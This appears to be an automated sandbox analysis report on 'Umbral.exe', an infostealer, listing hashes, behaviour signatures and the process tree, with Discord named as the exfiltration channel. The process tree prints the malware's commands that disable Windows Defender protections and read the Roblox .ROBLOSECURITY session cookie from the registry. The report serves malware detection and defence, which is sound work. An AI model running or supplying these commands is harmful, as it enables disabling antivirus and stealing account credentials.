Analysis
-
max time kernel
149s -
max time network
150s -
platform
windows10-2004_x64 -
resource
win10v2004-20241007-en -
resource tags
arch:x64arch:x86image:win10v2004-20241007-enlocale:en-usos:windows10-2004-x64system -
submitted
08-12-2024 15:02
Behavioral task
behavioral1
Sample
Umbral.exe
Resource
win7-20240903-en
General
-
Target
Umbral.exe
-
Size
229KB
-
MD5
0cc2a414bb58a3f9e345ea56350ff9a4
-
SHA1
09ec47af8c94ac3a94ad0e29df8a1405a6bc9e01
-
SHA256
2ce5ab90e160d795bee80f40ab817b2beb35fb43845e61658942eda4ca0b376c
-
SHA512
007ea98156043b18be5a612741ca9d2a0494dd5a5f7cea06a27185ac0de3950dd295d7e5066ea4313e3c517159b96450397e9645798fb2a2abd92ab8c21adccb
-
SSDEEP
6144:tloZM0rIkd8g+EtXHkv/iD4eKbNoOJBiVHaIJtM9Xb8e1mgri:voZDL+EP8eKbNoOJBiVHaIJtMZ3m
Malware Config
Signatures
-
Detect Umbral payload 1 IoCs
resource yara_rule behavioral2/memory/4224-1-0x00000214EB7F0000-0x00000214EB830000-memory.dmp family_umbral -
Umbral family
-
Command and Scripting Interpreter: PowerShell 1 TTPs 4 IoCs
Run Powershell to modify Windows Defender settings to add exclusions for file extensions, paths, and processes.
pid Process 4916 powershell.exe 1876 powershell.exe 1632 powershell.exe 1868 powershell.exe -
Reads user/profile data of web browsers 3 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs
flow ioc 21 discord.com 20 discord.com -
Looks up external IP address via web service 1 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
flow ioc 8 ip-api.com -
Detects videocard installed 1 TTPs 1 IoCs
Uses WMIC.exe to determine videocard installed.
pid Process 976 wmic.exe -
Suspicious behavior: EnumeratesProcesses 11 IoCs
pid Process 4224 Umbral.exe 4916 powershell.exe 4916 powershell.exe 1876 powershell.exe 1876 powershell.exe 1632 powershell.exe 1632 powershell.exe 1236 powershell.exe 1236 powershell.exe 1868 powershell.exe 1868 powershell.exe -
Suspicious use of AdjustPrivilegeToken 64 IoCs
description pid Process Token: SeDebugPrivilege 4224 Umbral.exe Token: SeIncreaseQuotaPrivilege 3760 wmic.exe Token: SeSecurityPrivilege 3760 wmic.exe Token: SeTakeOwnershipPrivilege 3760 wmic.exe Token: SeLoadDriverPrivilege 3760 wmic.exe Token: SeSystemProfilePrivilege 3760 wmic.exe Token: SeSystemtimePrivilege 3760 wmic.exe Token: SeProfSingleProcessPrivilege 3760 wmic.exe Token: SeIncBasePriorityPrivilege 3760 wmic.exe Token: SeCreatePagefilePrivilege 3760 wmic.exe Token: SeBackupPrivilege 3760 wmic.exe Token: SeRestorePrivilege 3760 wmic.exe Token: SeShutdownPrivilege 3760 wmic.exe Token: SeDebugPrivilege 3760 wmic.exe Token: SeSystemEnvironmentPrivilege 3760 wmic.exe Token: SeRemoteShutdownPrivilege 3760 wmic.exe Token: SeUndockPrivilege 3760 wmic.exe Token: SeManageVolumePrivilege 3760 wmic.exe Token: 33 3760 wmic.exe Token: 34 3760 wmic.exe Token: 35 3760 wmic.exe Token: 36 3760 wmic.exe Token: SeIncreaseQuotaPrivilege 3760 wmic.exe Token: SeSecurityPrivilege 3760 wmic.exe Token: SeTakeOwnershipPrivilege 3760 wmic.exe Token: SeLoadDriverPrivilege 3760 wmic.exe Token: SeSystemProfilePrivilege 3760 wmic.exe Token: SeSystemtimePrivilege 3760 wmic.exe Token: SeProfSingleProcessPrivilege 3760 wmic.exe Token: SeIncBasePriorityPrivilege 3760 wmic.exe Token: SeCreatePagefilePrivilege 3760 wmic.exe Token: SeBackupPrivilege 3760 wmic.exe Token: SeRestorePrivilege 3760 wmic.exe Token: SeShutdownPrivilege 3760 wmic.exe Token: SeDebugPrivilege 3760 wmic.exe Token: SeSystemEnvironmentPrivilege 3760 wmic.exe Token: SeRemoteShutdownPrivilege 3760 wmic.exe Token: SeUndockPrivilege 3760 wmic.exe Token: SeManageVolumePrivilege 3760 wmic.exe Token: 33 3760 wmic.exe Token: 34 3760 wmic.exe Token: 35 3760 wmic.exe Token: 36 3760 wmic.exe Token: SeDebugPrivilege 4916 powershell.exe Token: SeDebugPrivilege 1876 powershell.exe Token: SeDebugPrivilege 1632 powershell.exe Token: SeDebugPrivilege 1236 powershell.exe Token: SeIncreaseQuotaPrivilege 4996 wmic.exe Token: SeSecurityPrivilege 4996 wmic.exe Token: SeTakeOwnershipPrivilege 4996 wmic.exe Token: SeLoadDriverPrivilege 4996 wmic.exe Token: SeSystemProfilePrivilege 4996 wmic.exe Token: SeSystemtimePrivilege 4996 wmic.exe Token: SeProfSingleProcessPrivilege 4996 wmic.exe Token: SeIncBasePriorityPrivilege 4996 wmic.exe Token: SeCreatePagefilePrivilege 4996 wmic.exe Token: SeBackupPrivilege 4996 wmic.exe Token: SeRestorePrivilege 4996 wmic.exe Token: SeShutdownPrivilege 4996 wmic.exe Token: SeDebugPrivilege 4996 wmic.exe Token: SeSystemEnvironmentPrivilege 4996 wmic.exe Token: SeRemoteShutdownPrivilege 4996 wmic.exe Token: SeUndockPrivilege 4996 wmic.exe Token: SeManageVolumePrivilege 4996 wmic.exe -
Suspicious use of WriteProcessMemory 20 IoCs
description pid Process procid_target PID 4224 wrote to memory of 3760 4224 Umbral.exe 82 PID 4224 wrote to memory of 3760 4224 Umbral.exe 82 PID 4224 wrote to memory of 4916 4224 Umbral.exe 85 PID 4224 wrote to memory of 4916 4224 Umbral.exe 85 PID 4224 wrote to memory of 1876 4224 Umbral.exe 87 PID 4224 wrote to memory of 1876 4224 Umbral.exe 87 PID 4224 wrote to memory of 1632 4224 Umbral.exe 89 PID 4224 wrote to memory of 1632 4224 Umbral.exe 89 PID 4224 wrote to memory of 1236 4224 Umbral.exe 91 PID 4224 wrote to memory of 1236 4224 Umbral.exe 91 PID 4224 wrote to memory of 4996 4224 Umbral.exe 93 PID 4224 wrote to memory of 4996 4224 Umbral.exe 93 PID 4224 wrote to memory of 1680 4224 Umbral.exe 95 PID 4224 wrote to memory of 1680 4224 Umbral.exe 95 PID 4224 wrote to memory of 2200 4224 Umbral.exe 97 PID 4224 wrote to memory of 2200 4224 Umbral.exe 97 PID 4224 wrote to memory of 1868 4224 Umbral.exe 99 PID 4224 wrote to memory of 1868 4224 Umbral.exe 99 PID 4224 wrote to memory of 976 4224 Umbral.exe 101 PID 4224 wrote to memory of 976 4224 Umbral.exe 101
Processes
-
C:\Users\Admin\AppData\Local\Temp\Umbral.exe"C:\Users\Admin\AppData\Local\Temp\Umbral.exe"1⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:4224 -
C:\Windows\System32\Wbem\wmic.exe"wmic.exe" csproduct get uuid2⤵
- Suspicious use of AdjustPrivilegeToken
PID:3760
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Umbral.exe'2⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4916
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell.exe" Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 22⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1876
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell.exe" Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY2⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1632
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell.exe" Get-ItemPropertyValue -Path HKLN:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1236
-
-
C:\Windows\System32\Wbem\wmic.exe"wmic.exe" os get Caption2⤵
- Suspicious use of AdjustPrivilegeToken
PID:4996
-
-
C:\Windows\System32\Wbem\wmic.exe"wmic.exe" computersystem get totalphysicalmemory2⤵PID:1680
-
-
C:\Windows\System32\Wbem\wmic.exe"wmic.exe" csproduct get uuid2⤵PID:2200
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell.exe" Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER2⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
PID:1868
-
-
C:\Windows\System32\Wbem\wmic.exe"wmic" path win32_VideoController get name2⤵
- Detects videocard installed
PID:976
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
2KB
MD5d85ba6ff808d9e5444a4b369f5bc2730
SHA131aa9d96590fff6981b315e0b391b575e4c0804a
SHA25684739c608a73509419748e4e20e6cc4e1846056c3fe1929a8300d5a1a488202f
SHA5128c414eb55b45212af385accc16d9d562adba2123583ce70d22b91161fe878683845512a78f04dedd4ea98ed9b174dbfa98cf696370598ad8e6fbd1e714f1f249
-
Filesize
944B
MD56d42b6da621e8df5674e26b799c8e2aa
SHA1ab3ce1327ea1eeedb987ec823d5e0cb146bafa48
SHA2565ab6a1726f425c6d0158f55eb8d81754ddedd51e651aa0a899a29b7a58619c4c
SHA51253faffbda8a835bc1143e894c118c15901a5fd09cfc2224dd2f754c06dc794897315049a579b9a8382d4564f071576045aaaf824019b7139d939152dca38ce29
-
Filesize
948B
MD56a29e9f9eb72c3bffbb054cd27e3ceea
SHA1d38f7c2ad68dcf1d24deca9792256ff53d5218b2
SHA2567a9f831f96b9e4843751dea3ed57ee11d70bb83a5970ddf9d6bd440f4def442c
SHA512b4826f172c6ac60ad17412a634987c45640b1b8fe03aecba26510ae224685bcd571bc4b131724036e2b502b3a8198fb69414be8c72e46f833f0601a15d313430
-
Filesize
1KB
MD5276798eeb29a49dc6e199768bc9c2e71
SHA15fdc8ccb897ac2df7476fbb07517aca5b7a6205b
SHA256cd0a1056e8f1b6cb5cb328532239d802f4e2aa8f8fcdc0fcb487684bd68e0dcc
SHA5120d34fce64bbefc57d64fa6e03ca886952263d5f24df9c1c4cce6a1e8f5a47a9a21e9820f8d38caa7f7b43a52336ce00b738ea18419aaa7c788b72e04ce19e4f2
-
Filesize
1KB
MD5e731d04342acefb30a7006b3d20d4977
SHA1a8745005573ac1c2bb2d6318b47b250efdd0d9d8
SHA25672ca7db8b3ada50034d4b5dcb1be696b8574814fc55f6ea38812046cc3c9f8d7
SHA5127ea1392cc10a5aa176d013265a0fcd5dfac7b2606980ff29d8656c88069b1586f9a34e430695917631da443cf124afcd569421cf1e1bb1996c9c23063b9bccb9
-
Filesize
60B
MD5d17fe0a3f47be24a6453e9ef58c94641
SHA16ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA25696ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA5125b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82